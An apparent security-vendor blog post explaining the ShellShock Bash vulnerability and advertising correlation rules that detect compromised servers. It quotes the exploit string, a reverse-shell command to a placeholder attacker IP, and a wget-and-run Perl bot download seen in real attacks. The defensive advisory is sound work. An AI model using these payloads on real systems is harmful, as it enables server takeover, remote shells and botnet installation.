ShellShock Analysis

How ShellShock Works

ShellShock exploits a vulnerability in Bash. It allows unauthorized users to send commands to your Linux web servers. For example:

{ :;}; /bin/bash -c <command>


env X='() { (.+)=>\' bash -c "<filename> <command>"

<filename> and <command> can be anything. <command> will execute and the output will be in <filename>. .+ means one or more characters (like “a”, “b”, “cc”, “ddd”, “abcd”, etc.). The second form is a bit more tricky to use remotely, but I would not ignore the vulnerability.

Some examples of things that are being executed as we speak are:
wget 'https://<bad_server>/s.php?s=https://<your domain>/'
/bin/ping -c 1 <command_and_control>

These examples tell the hackers if a server is open to the exploit. However, remember: <command> can be anything. Attackers can remove files, modify your web site, copy any file from your web server, or execute database commands to steal all your secrets!

An example of a particularly bad <command> is:

/bin/bash -c 'bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1'

This gives attackers a shell to your web server. Anything they execute on <bad_ip> will be executed on your server. In one particular case, they installed a Perl bot with the following command:

wget -O /tmp/.lCE-unix https://<compromised_ip>/icons/xt.dat;perl /tmp/.lCE-unix <irc_channel>;rm -rf /tmp/.lCE-unix;uptime

This installs a Perl bot that takes commands from a command and control center and executes them on your server.

MetaFlows’ Response Highlights the Need for Multi-Session Analysis

We immediately deployed IDS rules published by our friends at SourceFire and Emerging Threats as soon as they came out. These rules detect the exploit itself but they will be triggered a lot because attackers are aggressively scanning web servers for vulnerabilities as we speak. This is where multi-session analysis comes into play. MetaFlows can tell you which servers being scanned are actually exploited! We have now published Correlation Engine Rules (a capability unique to the MetaFlows Security System) that not only tell you if there is an attempt to subvert your web servers, but also whether any of your servers were compromised.

MetaFlows Correlation Engine Rules work as follows:

  1. Detect an attempt to execute the ShellShock exploit on internal address A .
  2. Shortly thereafter, detect if there is a subsequent outbound flow (ICMP or TCP) from A to an external IP address.

If you are interested in deploying MetaFlows’ multi-session analysis with our Correlation Engine Rules, let us know at and we will be glad to help you get started.